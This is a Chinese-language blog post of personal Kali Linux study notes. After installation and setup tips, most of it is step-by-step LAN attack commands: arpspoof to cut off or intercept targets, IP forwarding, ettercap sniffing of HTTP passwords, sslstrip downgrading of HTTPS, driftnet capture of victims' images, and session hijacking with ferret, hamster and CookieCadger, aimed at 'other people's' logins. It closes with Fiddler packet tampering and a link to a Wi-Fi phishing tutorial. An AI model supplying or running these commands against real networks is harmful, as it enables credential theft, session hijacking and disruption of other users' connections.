• Kali


    安装kali双系统
    安装过程中,若出现无法挂载光盘,可以拔掉U盘,换个USB插口再试!!!!!!!!!
     
     

    http://www.ichunqiu.com/search/kali

     
     
     
    下载官方Kali IOS镜像文件(推荐32位)
    使用vm进行虚拟机的安装
     
    使用桥接模式,再配置静态IP
     
    service apache2 start  
    修改网关
     
    使kali能够使用ssh连接
    http://jingyan.baidu.com/article/eae07827a3e6bc1fec5485e3.html
     
    选择图像安装 graphcal install
     
    1 .安装vmtools工具
    虚拟机中安装vmtools工具
    解压文件 tar zxvf 文件名   (tab键自动补全)
    进入目录  ./绿色文件 开始安装 
    安装完成删除文件,rm 文件名  rm -r 文件夹名 (递归把文件夹删除)
     
     
    2.系统更新  更新源
    leafpad /etc/apt/sources.list
     
    百度网上找些更新源
     
    apt-get update  更新操作
    apt-get dist-upgrade  安装操作
     
     
    3.桌面美化
     
    apt-get install kde-full
     
    使用putty 或ssh工具连接 
    http://jingyan.baidu.com/article/eae07827a3e6bc1fec5485e3.html?qq-pf-to=pcqq.c2c
     
    字符重叠问题
      apt-get install ttf-wqy-microhei ttf-wqy-zenhei 
     
    -----基本操作命令
    dir ls 列目录
    sqlmap相当于明小子 阿D工具 NBSI等注入工具
    ettercap  欺骗工具
     
    find / -name sqlmap 查找命令 (指从根目录查找sqlmap名字的)
     
    ifconfig查看IP
    ifconfig -a 
    ifconfig -help
     
    端口扫描
    nmap -sS 10.70.40.246
     
    windows美化,雨滴
    酷鱼
    雨滴
     
    局域网断网攻击
    arp攻击
    使用rpspoof工具
     
    arpspoof -h --c查看参数
    arpspoof -i 网卡 -t 目标IP 网关
    (
    查看自己的网卡 ifconfig
     
    网关:目标的网关 192.168.65.2
    )
    怎么看局域网当中的IP
     
    fping -asg 192.168.65.0/24
     
    windows 查看 局域网主机  net view
    可以看到每台主机名  然后用  ping -4  主机名 就可以得到ip
    http://jingyan.baidu.com/article/870c6fc332ad88b03fe4bea3.html
     
    ARP断网其实是错误的配置,导致目标IP的流量经过我网卡
     
    获取内网
    别人浏览过的图片
    ARP欺骗,目标的IP流量经过我的网卡从网关出去
     
    arpspoof -i eth0 -t 192.168.65.128 192.168.65.2
     
    arpspoof -i eth0 -t 10.70.40.18 10.70.40.1
     
     
    进行IP流量转发
     
    echo 1 >/proc/sys/net/ipv4/ip_forward
     
    重启下网络服务
    /etc/init.d/networking restart
     
     
    (若想回到断网攻击状态需要 echo 0)
    echo 写命令是不会有回显的。
    写入之后使用
    arpspoof -i 网卡 -t 目标IP 网关
    此时arp成功欺骗,不会出现断网情况
     
    ARP欺骗 
    欺骗之后,使用
    ettercap -Tq -i eth0 嗅探
    但是这种欺骗只能得到http协议下的帐号密码
    当目标机器登录网站,
    将可以得到目标登录的网站和帐号密码
    当用户名是中文,需要转下编码
     
    获取本机网卡的图片
     
    查看我的网卡的图片信息
    driftnet -i eth0(这个需要在机器上才能打开,用ssh工具不可以)
    在黑窗口中变会显示,目标机器访问的图片,并会保存下来。(在 /root/文件夹下)
     
     
    HTTP用户名密码的获取
    但是这种欺骗只能得到http协议下的帐号密码
    ettercap攻击  欺骗 DNS欺骗 浏览嗅探
    ettercap -Tq -i eth0 嗅探 欺骗之后嗅探
    -Tq启动文本模式
    -i 加网卡
    cat /proc/sys/net/ipv4/ip_forward   查看文本
     
    HTTPS用户名密码的获取
    sslstrip工具
     
    vim文本编辑器,
    esc shift+:    q!不保存推出   wq
     
    vim /etc/ettercap/etter.conf
     
    去掉iptabiles 下面的 redir_ 前面的#号(两个)
    shift+:  wq!保存
    设置
    sslstrip功能能够把https的连接还原为http
    sslstrip -a -f -k
    欺骗 
    arpspoof -i eth0 -t 192.168.65.128 192.168.65.2
    嗅探
    ettercap -Tq -i eth0
     
    https缺点 容易出现证书错误(根据浏览器)
     
    会话劫持(登录别人登录过的网站)
    arpspoof 
    wireshark  抓包(只能在虚拟机里面使用)
    ferret 重新生成抓包后的文件
     hamster 重放流量
     
    方法一:
    先欺骗,
    wireshark
    抓包 (选择网卡),另存为pcap文件,生成一个pcap文件
     
    进到文件保存目录
    ferret -r  cookies.pcap
    目录下就会多一个txt文件
     
    hamster
     
     
    修改浏览器的代理为本地的  edit->Preferences->Advenced->netWork->setting 

     
    enter 保存
    在虚拟机浏览器中访问127.0.0.1:1234
     
    然后就可以在里面找你的想登陆的网站了。。
     
    将txt文件保存到root文件夹中
    cp hamster.txt /root/
     
    -- 方法二:
    ferret -i eth0
    hamster 
    然后在目标机器上访问了网站之后便可以在  127.0.0.1:1234 这个地址,点击 ap** 选择 eth0就可以发现有了。
    这是实时的检测,,很好玩
    只能监测通过你的eth0网卡的流量,,所以想要劫持别人的,需要欺骗
     
     
    一键劫持用户会话
    需要工具  CookieCadger-1.08.jar 在百度云盘里哈
     
    命令行打开 .jar文件,进到文件目录 Java -jar CookieCadger-1.08.jar
    选 yes
    选你想要监听的网卡  eth0
    然后这边如果开启了代理,需要将浏览器代理关掉 
     
     
    -----------------------------------------------------------------------------------------
     
    fiddler 进行抓包改包操作
    若抓不了谷歌的包可能是由于浏览器添加了其他代理导致的,卸载就好了
     
    开启之后便可以对浏览器的数据进行抓包操作
     
    断点改包  
     
    在命令行 输入 bpafter url
    保证 
    这里是这样的,代表在发送数据包前拦截 ,然后请求便会停止并等待,然后在右边便是数据包文了。便可以进行修改数据包操作,然后在
     
    修改之后,点击这个绿色的按钮,继续发送操作便可以实现拉阿拉
     
     
     
    http://m.baidu.com/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%400%2Csz%401320_1001%2Cta%40iphone_2_5.1_3_537/baiduid=B23722CE84BAEF1B0B4047E16AAF01BD/w=0_10_wifislax+%E9%92%93%E9%B1%BC/t=iphone/l=3/tc?ref=www_iphone&lid=14859882688158086667&order=1&vit=osres&tj=www_normal_1_0_10_title&m=8&srd=1&cltj=cloud_title&dict=30&nt=wnor&title=wifislax%E4%B8%AD%E7%9A%84linset%E8%BD%AF%E4%BB%B6%E9%92%93%E9%B1%BC%E6%95%99%E7%A8%8B&sec=12682&di=664323e8cd280a27&bdenc=1&tch=124.1464778239746.55.185.0.0&tch=124.460.29.146.1.133&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IEQGG_yFZ0z3xokmyxP4kHREsRDb6NnTLJ5DhxWeCvB9DwXOi0mYskNYWgK&eqid=ce38e892e7a3b80010000006574ebdf8&wd=&clk_info=%7B%22srcid%22%3A%22www_normal%22%2C%22tplname%22%3A%22www_normal%22%2C%22t%22%3A1464779416637%2C%22xpath%22%3A%22div-div-div-a-div-img%22%7D
     
     
     



  • 相关阅读:
    CDialogConfigStringRecord+CDialogConfigManage 如何保存listbox中未显示的信息
    vs2010 打开 vs2005 工程报错
    优秀程序员的两大要素:懒 + 笨
    架构设计中的方法学(四)
    程序员应该具备的素质汇总(逐步总结)(转)
    架构设计中的方法学(三)
    成都中青旅欢迎你
    游洪崖洞有感
    架构设计中的方法学(七)
    架构设计中的方法学(二)
  • 原文地址:https://www.cnblogs.com/kinmos/p/6829858.html
Copyright © 2020-2023  润新知